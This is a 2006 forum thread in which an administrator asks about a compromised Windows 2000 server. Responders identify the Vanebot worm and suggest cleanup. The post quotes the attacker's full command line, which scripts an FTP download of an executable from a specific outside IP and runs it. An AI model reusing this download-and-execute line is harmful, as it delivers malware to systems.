Solved

Compromised Windows 2000 Server?

Posted on 2006-10-25
14
270 Views
Last Modified: 2010-04-11
Hi,

I logged into a Win2k Server in a remote office this morning and was greeted by two ftp dos screens with the following in them :

83.70.16.16 Microsoft FTP
get 84785_redworld2.exe etc. etc.

Then there is some reference to 'Lizard Welcomes You' after FTP login..


This was in Start - Run :

cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It certainly appears that the server has been accessed from an external source.  We use a Sonicwall Firewall, Server is fully patched.  Can anyone shed some light on this please?



0
Comment
Question by:spower22
  • 5
  • 4
  • 3
  • +2
14 Comments
 
LVL 8

Accepted Solution

by:
mugman21 earned 500 total points
ID: 17801818
I'm guessing someone in the office downloaded something nasty, or opened an email attachment. This would have to be the case... Firewalls block inbound traffic, but allow it if outbound preceded it.

Is this a webserver, or is this a fileserver or something that is local only to your companies internal network???

If that was in Run, then several things come too mind. First, internal attack - but I doubt it. Second thought, you obviously have some sort of remote management software running, someone obviously got the pass and username. However you got in remotely, they took the same path.

If your running VNC, there is a zeroday in it.. The company can't seem to locate it, I've yet too find it, but someone has. I had a box running the newest version with all patches and fixes, everything configured properly. Some bastard  still got in....

VNC here?????

m.

0
 
LVL 18

Expert Comment

by:PowerIT
ID: 17801820
You captured a worm. Are people surfing or IM'ing on the server itself?

W32/Vanebot-M is a worm for the Windows platform. W32/Vanebot-M also contains IRC backdoor Trojan functionality which allows a remote intruder to gain access and control over the computer.

W32/Vanebot-M spreads:
to computers vulnerable to common exploits, including SRVSVC (MS06-040)
to MSSQL servers protected by weak passwords
to network shares
via MSN Messenger
via Yahoo Instant Messenger

W32/Vanebot-M may spread with the filename redworld.exe, redworld2.exe or <random numbers>_redworld2.exe.


J.
0
 
LVL 18

Expert Comment

by:PowerIT
ID: 17801822
As it also spreads through shares and weak SQL-server passwords, it could have entered through a client PC also.
Depending on how well al your rigths are set up it can be from an admin box, but also from a normal client.

J.
0
 
LVL 18

Expert Comment

by:PowerIT
ID: 17801988
Like mugman said: it could also have been installed manually through another exploit. His VNC vulnerability is an example, but there are tons of others.
Hope you can clean this out.

J.
0
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17802370
Don't forget to check the built-in user accounts for new admin accounts like qq$ or such. I had something similar in the end I blocked all non-essential outbound traffic from the server and restricted everything by IP address/range. Range being within the country I am in for web based remote stuff for end users. Was able to remove all the traces in the end and haven't heard bo-peep from it since in terms of problems.
0
 
LVL 8

Expert Comment

by:mugman21
ID: 17802406
The reason I specified the remote software or someone on the inside (i.e. pissed off employee) is this: the string left in the RUN's cache. Worms and virii shell themselve's or use some other programatic technique to launch their payload. If someone got in threw remote admin, they would navigate threw the system as if they were sitting in front of it (view of the screen), thus, RUN's command cache is left.

m.
0
 
LVL 4

Expert Comment

by:expexchuser
ID: 17807062
Looks like you've made a friend in Dublin, me lad...
http://www.dnsstuff.com/tools/whois.ch?ip=83.70.16.16
0
Get up to 2TB FREE CLOUD per backup license!

An exclusive Black Friday offer just for Expert Exchange audience! Buy any of our top-rated backup solutions & get up to 2TB free cloud per system! Perform local & cloud backup in the same step, and restore instantly—anytime, anywhere. Grab this deal now before it disappears!

 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17809454
Don't be silly it's probably some poor zombie computer bwaaaaah. On a serious note use your antivirus to clean up the executables and close up your firewall to be limited by IP for remote access. Then check for traces in the Services, Registry start up locations, filter drivers and AD OU's. Of course patch up your rig.
0
 
LVL 8

Expert Comment

by:mugman21
ID: 17809999
Machin, anti virus is worthless most of the time. The OP has already stated he is running with full patches and since this is a cooperate machine, I'm pretty damn sure it already has AV installed and the on access check failed. Why would an on access check fail, here's a concept: I can write viruses all day long and no AV product will pick them up until they see the evilness I've created... They have too see the work before they can generate signatures; bloodhound tech sucks.

What makes you think he didn't have a root kit installed?

Come on now.....

m.
0
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17810242
Sounds like you use Symantec.....I did an scan with a fully heuristic enabled symantec with an on-demand scan. It picked up 3 of the things that the hacker used. I used nod32 with full heuristics enabled and it picked up 43. And quite a few antivirus packages claim that they scan for root-kits as well.

But yeah I know what you mean. All depends on what the person used and how far the OP was able to intercede. From the looks of it they used some pretty generic stuff though, like they are only a kiddy scripter if they are downloading stuff that has already be labelled by symantec itself. Doesn't look like custom written tools.
0
 
LVL 8

Expert Comment

by:mugman21
ID: 17810262
From my experiance with the little VNC problem; I suppose that is still fresh in my mind.

And no, I don't use Symantec, I'm white listing with my very own beta 2.... :-)

m.
0
 
LVL 2

Expert Comment

by:Machin__Shin
ID: 17810437
I wish the author would actually comment on what type of remote client they used. I also have encountered the VNC problem.

Good on you and good luck ^_^, is it written in assembly? Personally I think that you answered the question with the first post. I'm just chucking in my two cents. But if I get a couple of points chucked my way I would be happy.
0
 
LVL 8

Expert Comment

by:mugman21
ID: 17810522
I have a little assembler in a sha1 function, mostly C though. Working to port parts to delphi. I have a couple dlls in Vb too. It's working, still need to overhaul it, need more consistancy in language/tools used. I need to get away from the assembler though....
0
 

Author Comment

by:spower22
ID: 17848572
Thanks for all your comments, I've secured VNC access on the firewall to only accept calls from my static ip and all seems ok now.  again, thanks for the responses
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

Password hashing is better than message digests or encryption, and you should be using it instead of message digests or encryption.  Find out why and how in this article, which supplements the original article on PHP Client Registration, Login, Logo…
It’s a strangely common occurrence that when you send someone their login details for a system, they can’t get in. This article will help you understand why it happens, and what you can do about it.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
This video discusses moving either the default database or any database to a new volume.

758 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

20 Experts available now in Live!

Get 1:1 Help Now